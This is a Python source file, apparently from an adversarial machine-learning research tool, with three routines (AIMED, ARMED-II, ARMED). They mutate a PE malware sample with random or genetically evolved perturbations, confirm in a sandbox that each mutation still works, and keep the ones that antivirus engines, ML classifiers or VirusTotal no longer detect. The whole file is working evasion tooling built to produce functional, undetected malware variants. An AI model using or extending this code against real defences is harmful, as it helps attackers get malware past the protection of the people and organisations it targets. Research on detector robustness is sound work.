def aimed(bin_bytes, sample, size_population, length_sequence, files_expected, scanner):
    '''
    AIMED: Automatic Intelligent Malware Modifications to Evade Detection

    Runs a genetic-programming (GP) search for PE adversarial examples.

    Input:
        bin_bytes: binaries from input malware sample
        sample: malware sample in terminal
        size_population: population size for GP (Default: 4)
        length_sequence: length of perturbation sequence
        files_expected: number of malware mutations expected as output
        scanner: commercial AV or malware model classifier
    '''
    # Full table of available perturbations
    actions = f.actions_vector(m.ACTION_TABLE.keys())

    # Bundle everything the evolutionary search needs into a single dict
    mutation = {
        'Malware_Bytes': bin_bytes,
        'Malware_Sample': sample,
        'Actions': actions,
        'Files_Expected': files_expected,
        'hash_sample': f.hash_files(sample),
        'Scanner': scanner,
    }

    # Run the evolutionary algorithm to search for successful mutations
    print('\n### AIMED: Automatic Intelligent Malware Modifications to Evade Detection ###')
    population = gp.Population(size=size_population,
                               length_sequence=length_sequence,
                               show_sequences=True)
    return population.generation(mutation=mutation)
def armed2(bin_bytes, sample, n, rounds, files_expected, scanner):
    '''
    ARMED-II: Automatic Random Malware Modifications to Evade Detection -- Incremental Iterations

    Injects random perturbations sequentially to input PE malware in order to
    find adversarial examples. After each injection, the malware mutation is
    tested for functionality (sandbox) and evasion (classifier).

    Input:
        bin_bytes: binaries from input malware sample
        sample: malware sample in terminal
        n: number of perturbations to inject
        rounds: number of rounds to run when searching for evasions
        files_expected: number of malware mutations expected as output
        scanner: commercial AV or malware model classifier
    '''
    # Create a dict with all perturbations
    actions = f.actions_vector(m.ACTION_TABLE.keys())

    # Get VT detections for original sample to use as benchmark
    hash_sample = f.hash_files(sample)
    sample_report = f.get_report_VT(hash_sample, rescan=False)
    #sample_report = {'positives': 49, 'total': 66} # Debug mode (without VT/offline)

    # Inject perturbations one position at a time and check for detection
    chosen_actions = [None] * n
    new_mutations = 0
    for x in range(n):
        for r in range(rounds):
            # Draw a fresh random action for position x of the sequence
            random_actions = f.create_random_actions(actions, x + 1)
            chosen_actions[x] = random_actions[0]
            print('\n### ARMED-II: Automatic Random Malware Modifications to Evade Detection ###\n')
            print('# Manipulation Box # Round {} # Perturbation {} of {} #\n'.
                  format(r + 1, x + 1, n))

            # Recursively inject the first x+1 perturbations on the sample
            mod_sample = f.rec_mod_files(bin_bytes, actions, chosen_actions, x, x + 1)
            print('\n# Sandbox (Oracle) # Round {} # Perturbation {} of {} #'.
                  format(r + 1, x + 1, n))

            # Send the modified sample to sandbox to check functionality (not corrupt)
            json_send = f.send_local_sandbox(mod_sample)

            # Hash of the modified sample, needed for the CSV report
            mod_sample_hash = f.hash_files(mod_sample)
            CSV = f.collect_info_CSV(sample, sample_report, x, chosen_actions,
                                     mod_sample_hash, hash_sample)

            # Malware analysis & malware detection stages (local checks only)
            useVT = False
            funcional, url_sandbox = malware_analysis(mod_sample, json_send, useVT, CSV)

            # Only functional (non-corrupt) mutations go to the classifier
            if funcional:
                print('# Malware Classifier # Round {} # Perturbation {} of {} #\n'
                      .format(r + 1, int(CSV['Perturbations']), n))

                # Check if mutation is detected
                mutation = CSV['Perturbations'] + '_m.exe'
                print('Running detection for:', mutation)
                detected = malware_detection(mutation, scanner)
                new_mutations += save_file_database(detected, mutation,
                                                   url_sandbox, CSV, scanner)

            if new_mutations == files_expected:
                break

        # Bug fix: the inner break only left the rounds loop; without this
        # guard the outer loop kept injecting perturbations past the target.
        if new_mutations == files_expected:
            break

    print('Evasive mutations found: {}'.format(new_mutations))
def armed(bin_bytes, sample, n, rounds, files_expected, detection_threshold, scanner):
    '''
    ARMED: Automatic Random Malware Modifications to Evade Detection

    Injects n random perturbations into input PE malware in order to find
    adversarial examples, checking each mutation for functionality (sandbox)
    and evasion (classifier or VirusTotal).

    Input:
        bin_bytes: binaries from input malware sample
        sample: malware sample in terminal
        n: number of perturbations to inject
        rounds: number of rounds to run when searching for evasions
        files_expected: number of malware mutations expected as output
        detection_threshold: run until number of detections is below threshold (only for VirusTotal)
        scanner: commercial AV or malware model classifier

    Returns:
        (new_samples, new_corrupt_samples): counts of evasive and corrupt
        mutations found during the last iteration of the outer loop.
    '''
    # Decide whether to use remote (VirusTotal) or local detection & remote or local sandbox
    useVT = False
    useHA = False

    # Loop-invariant work hoisted out of the search loops: the action table,
    # the original sample hash and its VT benchmark report never change
    # between rounds (this also avoids one remote VT query per round).
    actions = f.actions_vector(m.ACTION_TABLE.keys())
    hash_sample = f.hash_files(sample)
    sample_report = f.get_report_VT(hash_sample, rescan=False)
    #sample_report = {'positives': 49, 'total': 66} # Debug mode (without VT/offline)

    # Iterate to generate -m mutations for all perturbations on the loop
    max_number_perts = n
    while n <= max_number_perts:
        new_samples = 0
        new_corrupt_samples = 0
        for r in range(rounds):
            # Choose n random actions for this round
            chosen_actions = f.create_random_actions(actions, n)

            # Call a recursive function to inject n perturbations on a given sample
            print('\n### ARMED: Automatic Random Malware Modifications to Evade Detection ###\n')
            print('# Manipulation Box # Round {} of {} #\n'.format(r + 1, rounds))
            perturbs = n - 1
            start_pert = time()
            mod_sample = f.rec_mod_files(bin_bytes, actions, chosen_actions, perturbs, n)
            print('Time injecting perturbations: {} s'.format(round(time() - start_pert, 2)))

            # Send the modified sample to sandbox to check functionality (not corrupt)
            print('\n# Sandbox (Oracle) # Round {} of {} #'.format(r + 1, rounds))
            # Bug fix: the original bound the remote result to json_send_HA,
            # leaving json_send unbound on the useHA path when it is later
            # passed to malware_analysis().
            if useHA:
                json_send = f.send_HA(mod_sample, 120)
            else:
                json_send = f.send_local_sandbox(mod_sample)

            # Hash of the modified sample, needed for the CSV report
            mod_sample_hash = f.hash_files(mod_sample)
            CSV = f.collect_info_CSV(sample, sample_report, n - 1, chosen_actions,
                                     mod_sample_hash, hash_sample)

            # Malware analysis & malware detection stages
            funcional, url_sandbox = malware_analysis(mod_sample, json_send, useVT, CSV)

            # Check if use remote or local detection along with functionality
            if useVT and funcional:
                new_samples += 1
                CSV['Full_Analysis_Report'] = url_sandbox
                vt_positives = malware_detection_VT(sample_report, CSV)
                # Stop as soon as detections drop below the threshold
                if vt_positives < detection_threshold:
                    break
            elif not useVT and funcional:
                print('# Malware Classifier # Round {} # Perturbation {} of {} #\n'
                      .format(r + 1, int(CSV['Perturbations']), n))

                # Check if mutation is detected
                mutation = CSV['Perturbations'] + '_m.exe'
                print('Running detection for:', mutation)
                detected = malware_detection(mutation, scanner)
                new_samples += save_file_database(detected, mutation,
                                                 url_sandbox, CSV, scanner)
            elif not funcional:
                new_corrupt_samples += 1

            if r == rounds - 1:
                print('\n## Summary ##')
            if new_samples == files_expected:
                break

        print('Evasive mutations found: {}'.format(new_samples))
        print('Corrupt mutations found: {}'.format(new_corrupt_samples))
        n += 1

    return new_samples, new_corrupt_samples